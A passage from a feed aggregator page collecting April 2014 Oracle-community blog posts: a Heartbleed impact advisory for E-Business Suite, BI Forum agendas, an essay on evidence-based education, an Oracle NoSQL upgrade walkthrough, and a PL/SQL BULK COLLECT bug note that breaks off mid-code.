
Feed aggregator

First blogpost at my own hosted wordpress instance

Dietmar Aust - Mon, 2014-04-14 15:50
I have been blogging at daust.blogspot.com for quite a few years now ... many people prefer WordPress to Blogspot, and I can now understand why :).

It is quite flexible and easy to use and there are tons of themes available ... really cool ones.

In the end, though, the main reason for hosting my own WordPress instance was a different one. I have created two products, and they needed a platform on which to be presented:
First I wanted to buy a new theme from ThemeForest and build an APEX theme based on it ... but that is a lot of work.

I then decided to host my content using WordPress, since I had already bought a new theme: http://www.kriesi.at/themedemo/?theme=enfold

And this one has a really easy setup procedure for WordPress and comes with a ton of effects and wizards, a cool page designer, etc.

Hopefully this will get me motivated to post more frequently ... we will see ;).

Cheers,
~Dietmar.

OpenSSL Heartbleed (CVE-2014-0160) and Oracle E-Business Suite Impact

Integrigy has completed an in-depth security analysis of the "Heartbleed" vulnerability in OpenSSL (CVE-2014-0160) and the impact on Oracle E-Business Suite 11i (11.5) and R12 (12.0, 12.1, and 12.2) environments. The key issue is where in the environment the SSL termination point sits, both for internal and external communication between the client browser and the application servers.

1.  If the SSL termination point is the Oracle E-Business Suite application servers, then the environment is not vulnerable as stated in Oracle's guidance (Oracle Support Note ID 1645479.1 “OpenSSL Security Bug-Heartbleed” [support login required]).

2.  If the SSL termination point is a load balancer or reverse proxy, then the Oracle E-Business Suite environment MAY BE VULNERABLE to the Heartbleed vulnerability.  Environments using load balancers, like F5 Big-IP, or reverse proxies, such as Apache mod_proxy or BlueCoat, may be vulnerable depending on software versions.

Integrigy's detailed analysis of the use of OpenSSL in Oracle E-Business Suite environments is available here:

OpenSSL Heartbleed (CVE-2014-0160) and the Oracle E-Business Suite Impact Analysis

Please let us know if you have any questions or need additional information at info@integrigy.com.

Tags: Vulnerability, Oracle E-Business Suite
Categories: APPS Blogs, Security Blogs

Integrigy Collaborate 2014 Presentations

Integrigy had a great time at Collaborate 2014 last week in Las Vegas.  What did not stay in Las Vegas were many great sessions and a lot of good information on Oracle E-Business Suite 12.2, Oracle Security, and OBIEE.  Posted below are the links to the three papers that Integrigy presented.

If you have questions about our presentations, or any questions about OBIEE and E-Business Suite security, please contact us at info@integrigy.com

Tags: Oracle Database, Oracle E-Business Suite, Oracle Business Intelligence (OBIEE)
Categories: APPS Blogs, Security Blogs

Parallel Execution Skew – Demonstrating Skew

Randolf Geist - Mon, 2014-04-14 12:42
This is just a short notice that the next part of the mini-series "Parallel Execution Skew" has been published at AllThingsOracle.com.

Final Timetable and Agenda for the Brighton and Atlanta BI Forums, May 2014

Rittman Mead Consulting - Mon, 2014-04-14 07:00

It’s just a few weeks now until the Rittman Mead BI Forum 2014 events in Brighton and Atlanta, and there are still a few spaces left at both events if you’d like to come – check out the main BI Forum 2014 event page, and the booking links for Brighton (May 7th – 9th 2014) and Atlanta (May 14th – 16th 2014).

We’re also now able to publish the timetable and running order for the two events – session order can still change between now and the events, but this is what we’re planning to run, first of all in Brighton, with photos below from last year’s BI Forum.

Brighton

Brighton BI Forum 2014, Hotel Seattle, Brighton

Wednesday 7th May 2014 – Optional 1-Day Masterclass, and Opening Drinks, Keynote and Dinner

  • 9.00 – 10.00 – Registration
  • 10.00 – 11.00 : Lars George Hadoop Masterclass Part 1
  • 11.00 – 11.15 : Morning Coffee 
  • 11.15 – 12.15 : Lars George Hadoop Masterclass Part 2
  • 12.15 – 13.15 : Lunch
  • 13.15 – 14.15 : Lars George Hadoop Masterclass Part 3
  • 14.15 – 14.30 : Afternoon Tea/Coffee/Beers
  • 14.30 – 15.30 : Lars George Hadoop Masterclass Part 4
  • 17.00 – 19.00 : Registration and Drinks Reception
  • 19.00 – Late :  Oracle Keynote and Dinner at Hotel
Thursday 8th May 2014
  • 08.45 – 09.00 : Opening Remarks Mark Rittman, Rittman Mead
  • 09.00 – 10.00 : Emiel van Bockel : Extreme Intelligence, made possible by …
  • 10.00 – 10.30 : Morning Coffee 
  • 10.30 – 11.30 : Chris Jenkins : TimesTen for Exalytics: Best Practices and Optimisation
  • 11.30 – 12.30 : Robin Moffatt : No Silver Bullets : OBIEE Performance in the Real World
  • 12.30 – 13.30 : Lunch
  • 13.30 – 14.30 : Adam Bloom : Building a BI Cloud
  • 14.30 – 14.45 : TED: Paul Oprea : “Extreme Data Warehousing”
  • 14.45 – 15.00 : TED : Michael Rainey :  ”A Picture Can Replace A Thousand Words”
  • 15.00 – 15.30 : Afternoon Tea/Coffee/Beers
  • 15.30 – 15.45 : Reiner Zimmerman : About the Oracle DW Global Leaders Program
  • 15.45 – 16.45 : Andrew Bond & Stewart Bryson : Enterprise Big Data Architecture
  • 19.00 – Late: Depart for Gala Dinner, St Georges Church, Brighton

Friday 9th May 2014

  • 9.00 – 10.00 : Truls Bergensen – Drawing in a New Rock on the Map – How Will Endeca Fit in to Your Oracle BI Topography
  • 10.00 – 10.30 : Morning Coffee 
  • 10.30 – 11.30 : Nicholas Hurt & Michael Rainey : Real-time Data Warehouse Upgrade – Success Stories
  • 11.30 – 12.30 : Matt Bedin & Adam Bloom : Analytics and the Cloud
  • 12.30 – 13.30 : Lunch
  • 13.30 – 14.30 : Gianni Ceresa : Essbase within/without OBIEE – not just an aggregation engine
  • 14.30 – 14.45 : TED : Marco Klaasen : “Speed up RPD Development”
  • 14.45 – 15:00 : TED : Christian Berg : “Neo’s Voyage in OBIEE:”
  • 15.00 – 15.30 : Afternoon Tea/Coffee/Beers
  • 15.30 – 16.30 : Alistair Burgess : “Tuning TimesTen with Aggregate Persistence”
  • 16.30 – 16.45 : Closing Remarks (Mark Rittman)
Then, directly after Brighton, we’ve got the US Atlanta event, running the week after, Wednesday – Friday, with last year’s photos below:

Atlanta BI Forum 2014, Renaissance Mid-Town Hotel, Atlanta

Wednesday 14th May 2014 – Optional 1-Day Masterclass, and Opening Drinks, Keynote and Dinner

  • 9.00-10.00 – Registration
  • 10.00 – 11.00 : Lars George Hadoop Masterclass Part 1
  • 11.00 – 11.15 : Morning Coffee 
  • 11.15 – 12.15 : Lars George Hadoop Masterclass Part 2
  • 12.15 – 13.15 : Lunch
  • 13.15 – 14.15 : Lars George Hadoop Masterclass Part 3
  • 14.15 – 14.30 : Afternoon Tea/Coffee/Beers
  • 14.30 – 15.30 : Lars George Hadoop Masterclass Part 4
  • 16.00 – 18.00 : Registration and Drinks Reception
  • 18.00 – 19.00 : Oracle Keynote & Dinner

Thursday 15th May 2014

  • 08.45 – 09.00 : Opening Remarks Mark Rittman, Rittman Mead
  • 09.00 – 10.00 : Kevin McGinley : Adding 3rd Party Visualization to OBIEE
  • 10.00 – 10.30 : Morning Coffee 
  • 10.30 – 11.30 : Chris Linskey : Endeca Information Discovery for Self-Service and Big Data
  • 11.30 – 12.30 : Omri Traub : Endeca and Big Data: A Vision for the Future
  • 12.30 – 13.30 : Lunch
  • 13.30 – 14.30 : Dan Vlamis : Capitalizing on Analytics in the Oracle Database in BI Applications
  • 14.30 – 15.30 : Susan Cheung : TimesTen In-Memory Database for Analytics – Best Practices and Use Cases
  • 15.30 – 15.45 : Afternoon Tea/Coffee/Beers
  • 15.45 – 16.45 : Christian Screen : Oracle BI Got MAD and You Should Be Happy
  • 18.00 – 19.00 : Special Guest Keynote : Maria Colgan : An introduction to the new Oracle Database In-Memory option
  • 19.00 – leave for dinner

Friday 16th May 2014

  • 09.00 – 10.00 : Patrick Rafferty : More Than Mashups – Advanced Visualizations and Data Discovery
  • 10.00 – 10.30 : Morning Coffee 
  • 10.30 – 11.30 : Matt Bedin : Analytics and the Cloud
  • 11.30 – 12.30 : Jack Berkowitz : Analytic Applications and the Cloud
  • 12.30 – 13.30 : Lunch
  • 13.30 – 14.30 : Philippe Lions : What’s new on 2014 HY1 OBIEE SampleApp
  • 14.30 – 15.30 : Stewart Bryson : ExtremeBI: Agile, Real-Time BI with Oracle Business Intelligence, Oracle Data Integrator and Oracle GoldenGate
  • 15.30 – 16.00 : Afternoon Tea/Coffee/Beers
  • 16.00 – 17.00 : Wayne Van Sluys : Everything You Know about Oracle Essbase Tuning is Wrong or Outdated!
  • 17.00 – 17.15 : Closing Remarks (Mark Rittman)
Full details of the two events, including more on the Hadoop Masterclass with Cloudera’s Lars George, can be found on the BI Forum 2014 home page.

Categories: BI & Warehousing

Head in the Oven, Feet in the Freezer

Michael Feldstein - Mon, 2014-04-14 05:19

Some days, the internet gods are kind. On April 9th, I wrote,

We want talking about educational efficacy to be like talking about the efficacy of Advil for treating arthritis. But it’s closer to talking about the efficacy of various chemotherapy drugs for treating a particular cancer. And we’re really really bad at talking about that kind of efficacy. I think we have our work cut out for us if we really want to be able to talk intelligently and intelligibly about the effectiveness of any particular educational intervention.

On the very same day, the estimable Larry Cuban blogged,

So it is hardly surprising, then, that many others, including myself, have been skeptical of the popular idea that evidence-based policymaking and evidence-based instruction can drive teaching practice. Those doubts have grown larger when one notes what has occurred in clinical medicine with its frequent U-turns in evidence-based "best practices." Consider, for example, how new studies have often reversed prior "evidence-based" medical procedures.

* Hormone therapy for post-menopausal women to reduce heart attacks was found to be more harmful than no intervention at all.
* Getting a PSA test to determine whether the prostate gland showed signs of cancer for men over the age of 50 was "best practice" until 2012 when advisory panels of doctors recommended that no one under 55 should be tested and those older might be tested if they had family histories of prostate cancer.

And then there are new studies that recommend women to have annual mammograms, not at age 50 as recommended for decades, but at age 40. Or research syntheses (sometimes called "meta-analyses") that showed anti-depressant pills worked no better than placebos. These large studies done with randomized clinical trials–the current gold standard for producing evidence-based medical practice–have, over time, produced reversals in practice. Such turnarounds, when popularized in the press (although media attention does not mean that practitioners actually change what they do with patients) often diminished faith in medical research leaving most of us–and I include myself–stuck as to which healthy practices we should continue and which we should drop. Should I, for example, eat butter or margarine to prevent a heart attack? In the 1980s, the answer was: Don’t eat butter, cheese, beef, and similar high-saturated fat products. Yet a recent meta-analysis of those and subsequent studies reached an opposite conclusion. Figuring out what to do is hard because I, as a researcher, teacher, and person who wants to maintain good health has to sort out what studies say and how those studies were done from what the media report, and then how all of that applies to me. Should I take a PSA test? Should I switch from margarine to butter?

He put it much better than I did. While the gains in overall modern medicine have been amazing, anybody who has had even a moderately complex health issue (like back pain, for example) has had the frustrating experience of having a billion tests, being passed from specialist to specialist, and getting no clear answers.1 More on this point later.

Larry’s next post—actually a guest post by Francis Schrag—is an imaginary argument between an evidence-based education proponent and a skeptic. I won’t quote it here, but it is well worth reading in full.

My own position is somewhere between the proponent and the skeptic, though leaning more in the direction of the proponent. I don’t think we can measure everything that’s important about education, and it’s very clear that pretending that we can has caused serious damage to our educational system. But that doesn’t mean I think we should abandon all attempts to formulate a science of education. For me, it’s all about literacy. I want to give teachers and students skills to interpret the evidence for themselves and then empower them to use their own judgment.

To that end, let’s look at the other half of Larry’s April 9 post, the title of which is “What’s The Evidence on School Devices and Software Improving Student Learning?”

Lies, Damned Lies, and…

The heart of the post is a study by John Hattie, a Professor at the University of Auckland (NZ). He’s done meta-analysis on an enormous number of education studies, looking at effect sizes, measured on a scale from 0.1, which is negligible, to 1.0, which is a full standard deviation.
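
For readers who don’t work with meta-analyses every day, it may help to spell out what an effect size of this kind usually is: a standardized mean difference (commonly reported as Cohen’s d), i.e. the gap between the treatment-group and control-group means expressed in units of the pooled standard deviation, so an effect of 1.0 means the average student in the treatment group scored a full standard deviation above the average student in the control group:

d = (mean of treatment group − mean of control group) / pooled standard deviation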

He found that the "typical" effect size of an innovation was 0.4. To compare how different classroom approaches shaped student learning, Hattie used the "typical" effect size (0.4) to mean that a practice reached the threshold of influence on student learning (p. 5). From his meta-analyses, he then found that class size had a .20 effect (slide 15) while direct instruction had a .59 effect (slide 21). Again and again, he found that teacher feedback had an effect size of .72 (slide 32). Moreover, teacher-directed strategies of increasing student verbalization (.67) and teaching meta-cognition strategies (.67) had substantial effects (slide 32). What about student use of computers (p. 7)? Hattie included many "effect sizes" of computer use from distance education (.09), multimedia methods (.15), programmed instruction (.24), and computer-assisted instruction (.37). Except for "hypermedia instruction" (.41), all fell below the "typical" effect size (.40) of innovations improving student learning (slides 14-18). Across all studies of computers, then, Hattie found an overall effect size of .31 (p. 4).

The conclusion is that changing a classroom practice can often produce a significant effect size while adding a technology rarely does. But as my father likes to say, if you stick your head in the oven and your feet in the freezer, on average you’ll be comfortable.

Let’s think about introducing clickers to a classroom, for example. What class are you using them in? How often do you use them? When do you use them? What do you use them for? Clickers in and of themselves change nothing. No intervention is going to be educationally effective unless it gets students to perceive, act, and think differently. There are lots of ways to use clickers in the classroom that have no such effect. My guess is that, most of the time, they are used for formative assessments. Those can be helpful or not, but generally when done in this way are more about informing the teacher than they are directly about helping the student.

But there are other uses of clicker technologies. For example, University of Michigan professor Perry Samson recently blogged about using clickers to compare students’ sense of their physical and emotional well-being with their test performance:

Figure 2. Example of results from a student wellness question for a specific class day. Note the general collinearity of physical and emotional wellness.

I have observed over the last few years that a majority of the students who were withdrawing from my course in mid-semester commented on a crisis in health or emotion in their lives.  On a lark this semester I created an image-based question to ask students in LectureTools at the beginning of each class (example, Figure 2) that requested their self assessment of their current physical and emotional state. Clearly there is a wide variation in students’ perceptions of their physical and emotional state.  To analyze these data I performed cluster analysis on students’ reported emotional state prior to the first exam and found that temporal trends in this measure of emotional state could be clustered into six categories.

Figure 3. Trends in students’ self-reported emotional state prior to the first exam in class are clustered into six categories. The average emotional state for each cluster appears to be predictive of median first exam scores.

Perhaps not surprisingly Figure 3 shows that student outcomes on the first exam were very much related to the students’ self assessment of their emotional state prior to the exam.  This result is hard evidence for the intuitive, that students perform better when they are in a better emotional state.

I don’t know what Perry will end up doing with this information in terms of a classroom intervention. Nor do I know whether any such intervention will be effective. But it seems common sense not to lump it in with a million billion professors asking quiz questions on their clickers to aggregate it into an average of how effective clickers are.

To be fair, that’s not Larry’s point for quoting the Hattie study. He’s arguing against the reductionist argument that technology fixes everything—an argument which seems obviously absurd to everybody except, sadly, the people who seem to have the power to make decisions. But my point is that it is equally absurd to use this study as evidence that technology is generally not helpful. What I think it suggests is that it makes little sense to study the efficacy of educational technologies or products outside the context of the efficacy of the practices that they enable. More importantly, it’s a good example of how we all need to get much more sophisticated about reading the studies so we can judge for ourselves what they do and do not prove.

Of Back Mice and Men

I have had moderate to severe back pain for the past seven years. I have been to see orthopedists, pain specialists, rheumatologists, urologists, chiropractors, physical therapists, acupuncturists, and massage therapists. In many cases, I have seen more than one in any given category. I had X-rays, CAT scans, MRIs, and electrical probes inserted into my abdomen and legs. I had many needles of widely varying gauges stuck in me, grown humans walking on my back, gallons of steroids injected into me. I had the protective sheathes of my nerves fried with electricity. If you’ve ever had chronic pain, you know that you would probably go to a voodoo priest and drink goat urine if you thought it might help. (Sadly, there are apparently no voodoo priests in my area of Massachusetts—or at least none who have a web page.) Nobody I went to could help me.

Not too long ago, I had cause to visit my primary care physician, who is a good old country doctor. No specialist certificates, no Ivy League medical school degrees. Just a solid GP with some horse sense. In a state of despair, I explained my situation to him. He said, "Can I try something? Does it hurt when I touch you here?" OUCH!!!!

It turns out that I have a condition called "back mice," also called "episacral lipomas" when it is referred to in the medical literature, which, it turns out, happens rarely. I won’t go into the details of what they are, because that’s not important to the story. What’s important is what the doctor said next. "There’s hardly anything on them in the literature," he said. "The thing is, they don’t show up on any scans. They’re impossible to diagnose unless you actually touch the patient’s back."

I thought back to all the specialists I had seen over the years. None of the doctors ever once touched my back. Not one. My massage therapist actually found the back mice, but she didn’t know what they were, and neither of us knew that they were significant.

It turns out that once my GP discovered that these things exist, he started finding them everywhere. He told me a story of an eighty-year-old woman who had been hospitalized for "non-specific back pain." They doped her up with opiates and the poor thing couldn’t stand up without falling over. He gave her a couple of shots in the right place, and a week later she was fine. He has changed my life as well. I am not yet all better—we just started treatment two weeks ago—but I am already dramatically better.

The thing is, my doctor is an empiricist. In fact, he is one of the best diagnosticians I know. (And I have now met many.) He knew about back mice in the first place because he reads the literature avidly. But believing in the value of evidence and research is not the same thing as believing that only that which has been tested, measured, and statistically verified has value. Evidence should be a tool in the service of judgment, not a substitute for it. Isn’t that what we try to teach our students?

  1. But I’m not bitter.

The post Head in the Oven, Feet in the Freezer appeared first on e-Literate.

Big Data Oracle NoSQL in No Time - It is time to Upgrade

Senthil Rajendran - Mon, 2014-04-14 03:54
Big Data Oracle NoSQL in No Time - It is time to Upgrade 
Oracle NoSQL upgrade from 11gR2 to 12cR1 ( 2.0 to 3.0 )

Index
Big Data Oracle NoSQL in No Time - Getting Started Part 1
Big Data Oracle NoSQL in No Time - Startup & Shutdown Part 2
Big Data Oracle NoSQL in No Time - Setting up 1x1 Topology Part 3
Big Data Oracle NoSQL in No Time - Expanding 1x1 to 3x1 Topology Part 4
Big Data Oracle NoSQL in No Time - From 3x1 to 3x3 Topology Part 5
Big Data Oracle NoSQL in No Time - Smoke Testing Part 6
Big Data Oracle NoSQL in No Time - Increasing Throughput Read/Write Part 7

The upgrade is simple; NoSQL is brilliant in its simplicity.

Below are the steps:

  • verify prerequisite - verify that the storage nodes meet the prerequisites for upgrading.
  • show upgrade-order - get the ordered list of storage nodes that can be upgraded.
  • replace the software - unzip the new software.
  • verify upgrade - verify that the storage nodes have been upgraded to the version we downloaded.
In our scenario we have a 4x4 deployment topology with one admin node, and we will upgrade from 11gR2 to 12cR1. First, let us upgrade the admin node.

$ export KVHOME=$KVBASE/server1/oraclesoftware/kv-2.0.39
$ java -jar $KVHOME/lib/kvstore.jar stop -root $KVBASE/server1/storage
$ cd $KVBASE/server1/oraclesoftware
$ cp -Rf $KVBASE/stage/kv-3.0.5 .
$ export KVHOME=$KVBASE/server1/oraclesoftware/kv-3.0.5
$ nohup java -jar $KVHOME/lib/kvstore.jar start -root $KVBASE/server1/storage &
$ nohup: appending output to `nohup.out'
$ java -jar $KVHOME/lib/kvstore.jar runadmin -port 5000 -host server1
kv-> verify prerequisite
Verify: starting verification of mystore based upon topology sequence #8430 partitions and 4 storage nodes. Version: 12.1.3.0.5 Time: 2014-04-14 08:33:50 UTC
See server1:$KVBASE/server1/storage/mystore/log/mystore_{0..N}.log for progress messages
Verify prerequisite: Storage Node [sn3] on server3:5200    Zone: [name=datacenter1 id=zn1 type=PRIMARY]    Status: RUNNING   Ver: 11gR2.2.0.39 2014-03-27 10:00:25 UTC  Build id: cc4ac0e66407
Verify prerequisite: Storage Node [sn4] on server4:5300    Zone: [name=datacenter1 id=zn1 type=PRIMARY]    Status: RUNNING   Ver: 11gR2.2.0.39 2014-03-27 10:00:25 UTC  Build id: cc4ac0e66407
Verify prerequisite: Storage Node [sn1] on server1:5000    Zone: [name=datacenter1 id=zn1 type=PRIMARY]    Status: RUNNING   Ver: 12cR1.3.0.5 2014-03-27 10:00:25 UTC  Build id: cc4ac0e66407
Verify prerequisite: Storage Node [sn2] on server2:5100    Zone: [name=datacenter1 id=zn1 type=PRIMARY]    Status: RUNNING   Ver: 11gR2.2.0.39 2014-03-27 10:00:25 UTC  Build id: cc4ac0e66407
Verification complete, no violations.
kv->
kv-> show upgrade-order
Calculating upgrade order, target version: 12.1.3.0.5, prerequisite: 11.2.2.0.23
sn3
sn4
sn2
kv->
In our case the upgrade order is determined to be sn3, sn4 and then sn2. We can verify the upgrade order at each stage.
Now let us upgrade SN3
$ export KVHOME=$KVBASE/server3/oraclesoftware/kv-2.0.39
$ java -jar $KVHOME/lib/kvstore.jar stop -root $KVBASE/server3/storage
$
$ cd $KVBASE/server3/oraclesoftware
$ cp -Rf $KVBASE/stage/kv-3.0.5 .
$ export KVHOME=$KVBASE/server3/oraclesoftware/kv-3.0.5
$ nohup java -jar $KVHOME/lib/kvstore.jar start -root $KVBASE/server3/storage &
$
kv-> verify prerequisite
Verify: starting verification of mystore based upon topology sequence #8430 partitions and 4 storage nodes. Version: 12.1.3.0.5 Time: 2014-04-14 08:40:31 UTC
See server1:$KVBASE/server1/storage/mystore/log/mystore_{0..N}.log for progress messages
Verify prerequisite: Storage Node [sn3] on server3:5200    Zone: [name=datacenter1 id=zn1 type=PRIMARY]    Status: RUNNING   Ver: 12cR1.3.0.5 2014-03-27 10:00:25 UTC  Build id: cc4ac0e66407
Verify prerequisite: Storage Node [sn4] on server4:5300    Zone: [name=datacenter1 id=zn1 type=PRIMARY]    Status: RUNNING   Ver: 11gR2.2.0.39 2014-03-27 10:00:25 UTC  Build id: cc4ac0e66407
Verify prerequisite: Storage Node [sn1] on server1:5000    Zone: [name=datacenter1 id=zn1 type=PRIMARY]    Status: RUNNING   Ver: 12cR1.3.0.5 2014-03-27 10:00:25 UTC  Build id: cc4ac0e66407
Verify prerequisite: Storage Node [sn2] on server2:5100    Zone: [name=datacenter1 id=zn1 type=PRIMARY]    Status: RUNNING   Ver: 11gR2.2.0.39 2014-03-27 10:00:25 UTC  Build id: cc4ac0e66407
Verification complete, no violations.
kv->
kv-> show upgrade-order
Calculating upgrade order, target version: 12.1.3.0.5, prerequisite: 11.2.2.0.23
sn4
sn2
kv->

Now let us upgrade SN4
$ export KVHOME=$KVBASE/server4/oraclesoftware/kv-2.0.39
$ java -jar $KVHOME/lib/kvstore.jar stop -root $KVBASE/server4/storage
$
$ cd $KVBASE/server4/oraclesoftware
$ cp -Rf $KVBASE/stage/kv-3.0.5 .
$ export KVHOME=$KVBASE/server4/oraclesoftware/kv-3.0.5
$ nohup java -jar $KVHOME/lib/kvstore.jar start -root $KVBASE/server4/storage &
$
kv-> verify prerequisite
Verify: starting verification of mystore based upon topology sequence #8430 partitions and 4 storage nodes. Version: 12.1.3.0.5 Time: 2014-04-14 08:42:30 UTC
See server1:$KVBASE/server1/storage/mystore/log/mystore_{0..N}.log for progress messages
Verify prerequisite: Storage Node [sn3] on server3:5200    Zone: [name=datacenter1 id=zn1 type=PRIMARY]    Status: RUNNING   Ver: 12cR1.3.0.5 2014-03-27 10:00:25 UTC  Build id: cc4ac0e66407
Verify prerequisite: Storage Node [sn4] on server4:5300    Zone: [name=datacenter1 id=zn1 type=PRIMARY]    Status: RUNNING   Ver: 12cR1.3.0.5 2014-03-27 10:00:25 UTC  Build id: cc4ac0e66407
Verify prerequisite: Storage Node [sn1] on server1:5000    Zone: [name=datacenter1 id=zn1 type=PRIMARY]    Status: RUNNING   Ver: 12cR1.3.0.5 2014-03-27 10:00:25 UTC  Build id: cc4ac0e66407
Verify prerequisite: Storage Node [sn2] on server2:5100    Zone: [name=datacenter1 id=zn1 type=PRIMARY]    Status: RUNNING   Ver: 11gR2.2.0.39 2014-03-27 10:00:25 UTC  Build id: cc4ac0e66407
Verification complete, no violations.
kv->
kv-> show upgrade-order
Calculating upgrade order, target version: 12.1.3.0.5, prerequisite: 11.2.2.0.23
sn2
kv->
Now let us upgrade the last pending storage node SN2
$ export KVHOME=$KVBASE/server2/oraclesoftware/kv-2.0.39
$ java -jar $KVHOME/lib/kvstore.jar stop -root $KVBASE/server2/storage
$
$ cd $KVBASE/server2/oraclesoftware
$ cp -Rf $KVBASE/stage/kv-3.0.5 .
$ export KVHOME=$KVBASE/server2/oraclesoftware/kv-3.0.5
$ nohup java -jar $KVHOME/lib/kvstore.jar start -root $KVBASE/server2/storage &
$
kv-> verify prerequisite
Verify: starting verification of mystore based upon topology sequence #8430 partitions and 4 storage nodes. Version: 12.1.3.0.5 Time: 2014-04-14 08:44:12 UTC
See server1:$KVBASE/server1/storage/mystore/log/mystore_{0..N}.log for progress messages
Verify prerequisite: Storage Node [sn3] on server3:5200    Zone: [name=datacenter1 id=zn1 type=PRIMARY]    Status: RUNNING   Ver: 12cR1.3.0.5 2014-03-27 10:00:25 UTC  Build id: cc4ac0e66407
Verify prerequisite: Storage Node [sn4] on server4:5300    Zone: [name=datacenter1 id=zn1 type=PRIMARY]    Status: RUNNING   Ver: 12cR1.3.0.5 2014-03-27 10:00:25 UTC  Build id: cc4ac0e66407
Verify prerequisite: Storage Node [sn1] on server1:5000    Zone: [name=datacenter1 id=zn1 type=PRIMARY]    Status: RUNNING   Ver: 12cR1.3.0.5 2014-03-27 10:00:25 UTC  Build id: cc4ac0e66407
Verify prerequisite: Storage Node [sn2] on server2:5100    Zone: [name=datacenter1 id=zn1 type=PRIMARY]    Status: RUNNING   Ver: 12cR1.3.0.5 2014-03-27 10:00:25 UTC  Build id: cc4ac0e66407
Verification complete, no violations.
kv->
kv-> show upgrade-order
Calculating upgrade order, target version: 12.1.3.0.5, prerequisite: 11.2.2.0.23
There are no nodes that need to be upgraded
kv->
Let us quickly verify the upgrade process
kv-> verify upgrade
Verify: starting verification of mystore based upon topology sequence #8430 partitions and 4 storage nodes. Version: 12.1.3.0.5 Time: 2014-04-14 08:44:27 UTC
See server1:$KVBASE/server1/storage/mystore/log/mystore_{0..N}.log for progress messages
Verify upgrade: Storage Node [sn3] on server3:5200    Zone: [name=datacenter1 id=zn1 type=PRIMARY]    Status: RUNNING   Ver: 12cR1.3.0.5 2014-03-27 10:00:25 UTC  Build id: cc4ac0e66407
Verify upgrade: Storage Node [sn4] on server4:5300    Zone: [name=datacenter1 id=zn1 type=PRIMARY]    Status: RUNNING   Ver: 12cR1.3.0.5 2014-03-27 10:00:25 UTC  Build id: cc4ac0e66407
Verify upgrade: Storage Node [sn1] on server1:5000    Zone: [name=datacenter1 id=zn1 type=PRIMARY]    Status: RUNNING   Ver: 12cR1.3.0.5 2014-03-27 10:00:25 UTC  Build id: cc4ac0e66407
Verify upgrade: Storage Node [sn2] on server2:5100    Zone: [name=datacenter1 id=zn1 type=PRIMARY]    Status: RUNNING   Ver: 12cR1.3.0.5 2014-03-27 10:00:25 UTC  Build id: cc4ac0e66407
Verification complete, no violations.
kv->

As an Oracle DBA I know how complex upgrades can be, but upgrading Oracle NoSQL is refreshingly different.

Mobile device management is a two-sided battle

Chris Foot - Mon, 2014-04-14 01:39

The rise of the Internet of Things and the bring-your-own-device phenomenon have shaped the way database administration specialists conduct mobile device management. Many of these professionals are employed by retailers using customer relationship management applications that collect and analyze data from smartphones, tablets and numerous other devices. This level of activity creates a web of connectivity that's difficult to manage and often necessitates expert surveillance. 

Managing the remote workplace 
Merchandisers are challenged with the task of effectively securing all mobile assets used by their employees. Many of these workers have access to sensitive corporate information, whether it be product development files, customer loyalty account numbers or consumer payment data. According to CIO, some organizations lack the in-house IT resources to effectively manage the avenues through which intelligence flows from smartphones to servers.

As a result, small and midsize businesses often outsource to remote database support services to gain a comprehensive overview of their BYOD operations. David Lingenfelter, an information security officer at Fiberlink, told the news source that the problem many SMBs face is that their employees are using their own individual mobile devices to access company information. Many large enterprises often provide their workers with such machines, so there's inherent surveillance over the connections they're making. 

Moving to the home front 
Small, medium and large retailers alike are continuing to use CRM, which provides these commodity-based businesses with specific information regarding individuals. The IoT has expanded the capabilities of these programs, delivering data from a wide variety of smart devices such as cars, watches and even refrigerators. The information funneled into company servers comes from remote devices, creating a unique kind of mobile device management for database administration services to take on.

Frank Gillett, a contributor to InformationWeek, noted that many consumers are connecting numerous devices to a singular home-based network, providing merchandisers with a view of how a family or group of apartment mates interacts with the Web. In addition, routers and gateways are acting as defaults for making network-connected homes ubiquitous. 

"These devices bring the Internet to every room of the house, allowing smart gadgets with communications to replace their dumb processors," noted Gillett.

However, it's not as if the incoming information submitted by these networks can be thrown into a massive jumble. In order to provide security and organize the intelligence appropriately, remote DBA providers monitor the connections and organize the results into identifiable, actionable data. 

OOW : Call4Proposals ... J-2

Jean-Philippe Pinte - Mon, 2014-04-14 01:09
If you would like to present at the next edition of Oracle Open World, there are only two days left to submit your topic:
http://www.oracle.com/openworld/call-for-papers/index.html

Don’t use %NOTFOUND with BULK COLLECT

Michael Dinh - Sun, 2014-04-13 16:54

I was working on a script for the ultimate RMAN backup validation and hoping to submit the article for an Oracle conference.

To my chagrin, one version of the script was failing for one condition and the other version would fail for another condition.

Basically, the script was very buggy.

The objective is to create an RMAN script to validate 8 backupsets at a time.

I decided to use BULK COLLECT with the LIMIT clause.

Currently there are only 6 backupsets.

ARROW:(MDINH@db01):PRIMARY> create table t as SELECT * FROM V$BACKUP_SET WHERE incremental_level > 0;

Table created.

ARROW:(MDINH@db01):PRIMARY> select recid from t;

     RECID
----------
       609
       610
       611
       612
       613
       614

6 rows selected.

ARROW:(MDINH@db01):PRIMARY>

Using LIMIT 8 when there are only 6 records sets %NOTFOUND on the fetch, so the loop exits before anything is printed - it looks as if ZERO records were returned.

ARROW:(MDINH@db01):PRIMARY> r
  1  DECLARE
  2    CURSOR c_level1 IS
  3      SELECT recid FROM t WHERE incremental_level > 0;
  4    TYPE t_level1 IS
  5      TABLE OF c_level1%ROWTYPE INDEX BY PLS_INTEGER;
  6    l_level1 t_level1;
  7    l_str VARCHAR2(1000);
  8  BEGIN
  9    OPEN c_level1;
 10    LOOP
 11      FETCH c_level1 BULK COLLECT INTO l_level1 LIMIT 8;
 12      FOR i IN 1..l_level1.COUNT
 13      LOOP
 14        l_str := l_str||l_level1(i).recid||',';
 15      END LOOP;
 16      EXIT WHEN c_level1%NOTFOUND;
 17      l_str := 'validate backupset '||RTRIM(l_str,',')||';';
 18      dbms_output.put_line(l_str);
 19    END LOOP;
 20    CLOSE c_level1;
 21  EXCEPTION
 22    WHEN others THEN RAISE;
 23* END;

PL/SQL procedure successfully completed.

Why not output the results before the EXIT WHEN clause? That works just fine.

ARROW:(MDINH@db01):PRIMARY> r
  1  DECLARE
  2    CURSOR c_level1 IS
  3      SELECT recid FROM t WHERE incremental_level > 0;
  4    TYPE t_level1 IS
  5      TABLE OF c_level1%ROWTYPE INDEX BY PLS_INTEGER;
  6    l_level1 t_level1;
  7    l_str VARCHAR2(1000);
  8  BEGIN
  9    OPEN c_level1;
 10    LOOP
 11      FETCH c_level1 BULK COLLECT INTO l_level1 LIMIT 8;
 12      FOR i IN 1..l_level1.COUNT
 13      LOOP
 14        l_str := l_str||l_level1(i).recid||',';
 15      END LOOP;
